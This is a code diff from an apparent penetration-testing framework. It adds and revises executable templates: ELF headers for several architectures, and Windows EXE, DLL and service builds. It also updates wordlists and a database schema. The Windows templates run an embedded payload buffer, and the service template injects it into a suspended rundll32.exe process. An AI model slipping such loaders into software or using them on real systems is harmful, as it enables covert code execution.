+#!/bin/sh
+
+dst_folder="../../../"
+for file in $(find ./ -name "*.s")
+do
+   arch=`echo $file | cut -d "_" -f2`;
+   nasm -f bin $file -o $dst_folder"template_"$arch"_linux.bin"
+ done
@@ -1,7 +1,6 @@
 ; build with:
 ;   nasm elf_aarch64_template.s -f bin -o template_aarch64_linux.bin

-
 BITS 64
 org     0x400000
 ehdr:                            ; Elf32_Ehdr
@@ -0,0 +1,37 @@
+; build with:
+;   nasm elf_armbe_template.s -f bin -o template_armbe_linux.bin
+
+BITS 32
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x2800                   ;   e_machine    = ARM
+  dd    0x01000000               ;   e_version
+  dd    0x54800000               ;   e_entry
+  dd    0x34000000               ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x3400                   ;   e_ehsize
+  dw    0x2000                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0                        ;   p_offset
+  dd    0x00800000               ;   p_vaddr
+  dd    0x00800000               ;   p_paddr
+  dd    0xefbeadde               ;   p_filesz
+  dd    0xefbeadde               ;   p_memsz
+  dd    0x07000000               ;   p_flags      = rwx
+  dd    0x00100000               ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_loongarch64_template.s -f bin -o template_loongarch64_linux.bin
+
+BITS 64
+
+org     0x80400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0x102                    ;   e_machine    = LOONGARCH
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,55 @@
+; build with:
+;   nasm elf_mips64_template.s -f bin -o template_mips64_linux.bin
+
+%define WORD_BE(value) (((value & 0xFF) << 8) | ((value >> 8) & 0xFF))
+%define DWORD_BE(dword) (((dword & 0xFF) << 24) | \
+                        ((dword & 0xFF00) << 8) | \
+                        ((dword >> 8) & 0xFF00) | \
+                        ((dword >> 24) & 0xFF))
+%define QWORD_BE(qword) ( \
+    ((qword & 0x00000000000000FF) << 56) | \
+    ((qword & 0x000000000000FF00) << 40) | \
+    ((qword & 0x0000000000FF0000) << 24) | \
+    ((qword & 0x00000000FF000000) << 8) | \
+    ((qword >> 8) & 0x000000FF00000000) | \
+    ((qword >> 24) & 0x0000FF0000000000) | \
+    ((qword >> 40) & 0x00FF000000000000) | \
+    ((qword >> 56) & 0xFF00000000000000) )
+
+BITS 64
+
+org     0x400000
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    WORD_BE(2)               ;   e_type       = ET_EXEC for an executable
+  dw    WORD_BE(0x08)            ;   e_machine    = MIPS
+  dd    0                        ;   e_version
+  dq    QWORD_BE(0x400078)       ;   e_entry
+  dq    QWORD_BE(0x40)           ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    WORD_BE(0x40)            ;   e_ehsize
+  dw    WORD_BE(0x38)            ;   e_phentsize
+  dw    WORD_BE(0x1)             ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    DWORD_BE(1)              ;   p_type       = PT_LOAD
+  dd    DWORD_BE(7)              ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    QWORD_BE(0x400000)       ;   p_vaddr
+  dq    QWORD_BE(0x400000)       ;   p_paddr
+  dq    QWORD_BE(0xA00000)       ;   p_filesz
+  dq    QWORD_BE(0xA00000)       ;   p_memsz
+  dq    QWORD_BE(0x1000)         ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
@@ -0,0 +1,40 @@
+; build with:
+;   nasm elf_ppc64le_template.s -f bin -o template_ppc64le_linux.bin
+
+BITS 64
+
+org 0x400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0x15                     ;   e_machine    = PPC64
+  dd    0                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
+dq _start+0x8
@@ -0,0 +1,37 @@
+; build with:
+;   nasm elf_ppc_template.s -f bin -o template_ppc_linux.bin
+
+BITS 32
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1400                   ;   e_machine    = PPC
+  dd    0x01000000               ;   e_version
+  dd    0x54100000               ;   e_entry
+  dd    0x34000000               ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x3400                   ;   e_ehsize
+  dw    0x2000                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0                        ;   p_offset
+  dd    0x00100000               ;   p_vaddr
+  dd    0x00100000               ;   p_paddr
+  dd    0xefbeadde               ;   p_filesz
+  dd    0xefbeadde               ;   p_memsz
+  dd    0x07000000               ;   p_flags      = rwx
+  dd    0x00000100               ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
@@ -0,0 +1,37 @@
+; build with:
+;   nasm elf_ppce500v2_template.s -f bin -o template_ppce500v2_linux.bin
+
+BITS 32
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1400                   ;   e_machine    = PPC
+  dd    0x01000000               ;   e_version
+  dd    0x54100000               ;   e_entry
+  dd    0x34000000               ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x3400                   ;   e_ehsize
+  dw    0x2000                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0                        ;   p_offset
+  dd    0x00100000               ;   p_vaddr
+  dd    0x00100000               ;   p_paddr
+  dd    0xefbeadde               ;   p_filesz
+  dd    0xefbeadde               ;   p_memsz
+  dd    0x07000000               ;   p_flags      = rwx
+  dd    0x00000100               ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
@@ -0,0 +1,34 @@
+; build with:
+;   nasm elf_zarch_template.s -f bin -o template_zarch_linux.bin
+
+BITS 64
+
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1600                   ;   e_machine    = ZARCH
+  dd    0x01000000               ;   e_version
+  dq    0x7810000000000000       ;   e_entry
+  dq    0x4000000000000000       ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x4000                   ;   e_ehsize
+  dw    0x3800                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+phdr:                            ; Elf32_Phdr
+  dd    0x01000000               ;   p_type       = PT_LOAD
+  dd    0x07000000               ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    0x0010000000000000       ;   p_vaddr
+  dq    0x0010000000000000       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x0000100000000000       ;   p_align
+
+_start:
@@ -1,8 +1,8 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building DLLs
-Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+## Building
+Use the provided `build_all.bat` file, and run it from within the Visual Studio
 developer console. The batch file requires that the `%VCINSTALLDIR%` environment
 variable be defined (which it should be by default). The build script will
 create both the x86 and x64 templates before moving them into the correct
@@ -0,0 +1,17 @@
+@echo off
+
+echo Compiling DLLs
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  call build.bat
+  popd
+)
+
+echo Compiling EXEs
+
+for /D %%e in (exe*) do (
+  pushd "%%e"
+  call build.bat
+  popd
+)
@@ -1,7 +0,0 @@
-@echo off
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  build.bat
-  popd
-)
@@ -3,6 +3,7 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,26 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
@@ -1,343 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="service"
-	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-	RootNamespace="service"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../service.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../template_x64_windows_svc.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\service.c"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
@@ -1,11 +1,11 @@
-#include <stdio.h>
+#include <windows.h>

 #define SCSIZE 4096
-char payload[SCSIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

-char comment[512] = "";
-
-int main(int argc, char **argv) {
-	(*(void (*)()) payload)();
-	return(0);
+void main() {
+	DWORD dwOldProtect;
+	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
+	(*(void (*)()) bPayload)();
+	return;
 }
@@ -1,32 +0,0 @@
-; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Architecture: x64
-;
-; Assemble and link with the following command:
-; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
-
-extrn ExitProcess : proc
-extrn VirtualAlloc : proc
-
-.code
-
-	main proc 
-		sub rsp, 40        ;
-		mov r9, 40h        ; 
-		mov r8, 3000h      ; 
-		mov rdx, 4096      ; 
-		xor rcx, rcx       ; 
-		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-		mov rcx, 4096      ;
-		mov rsi, payload   ;
-		mov rdi, rax       ;
-		rep movsb          ; memcpy( lpPayload, payload, 4096 );
-		call rax           ; lpPayload();
-		xor rcx, rcx       ;
-		call ExitProcess   ; ExitProcess( 0 );
-	main endp
-	
-	payload proc
-		A byte 'PAYLOAD:'
-		B db 4096-8 dup ( 0 )
-	payload endp
-end
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,16 +1,28 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define PAYLOAD_SIZE	8192
+#define SCSIZE 8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

+#if BUILDMODE == 2
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+#endif
+
 /*
 *
 */
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
-	ZeroMemory( &si, sizeof(STARTUPINFO) );
-	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
+	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
+	inline_bzero( &si, sizeof(STARTUPINFO) );
+	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-  
+
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-		  
+
 			GetThreadContext( pi.hThread, &Context );
-		  
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (DWORD64)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayload;
 #else
-				Context.Eip = (DWORD)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-			
+
 			CloseHandle( pi.hThread );
-		  
+
 			CloseHandle( pi.hProcess );
 		}
-		
+
 		ServiceHandler( SERVICE_CONTROL_STOP );
-		
+
 		ExitProcess( 0 );
 	}
 }
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
+void main()
 {
-	SERVICE_TABLE_ENTRY st[] = 
-    { 
-        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
-        { NULL, NULL } 
-    };
-	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	SERVICE_TABLE_ENTRY st[] =
+		{
+			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
+			{ NULL, NULL }
+		};
+	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	return;
 }
@@ -24,3 +24,4 @@ wkssvc
 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
 db2remotecmd
 CxUIUSvcChannel
+cert
@@ -1,3 +1,5 @@
+acf-extended
+ai-engine
 ajax-load-more
 all-in-one-wp-migration
 backup
@@ -23,6 +25,7 @@ gi-media-library
 give
 hash-form
 inboundio-marketing
+king-addons
 learnpress
 loginizer
 masterstudy-lms-learning-management-system
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
+ActiveRecord::Schema[7.2].define(version: 2025_07_21_114306) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -521,6 +521,16 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
    t.string "netmask"
  end

+  create_table "service_links", force: :cascade do |t|
+    t.bigint "parent_id", null: false
+    t.bigint "child_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["child_id"], name: "index_service_links_on_child_id"
+    t.index ["parent_id", "child_id"], name: "index_service_links_on_parent_id_and_child_id", unique: true
+    t.index ["parent_id"], name: "index_service_links_on_parent_id"
+  end
+
  create_table "services", id: :serial, force: :cascade do |t|
    t.integer "host_id"
    t.datetime "created_at", precision: nil
@@ -530,7 +540,8 @@ ActiveRecord::Schema[7.2].define(version: 2025_02_04_172657) do
    t.string "name"
    t.datetime "updated_at", precision: nil
    t.text "info"
-    t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
+    t.jsonb "resource", default: {}, null: false
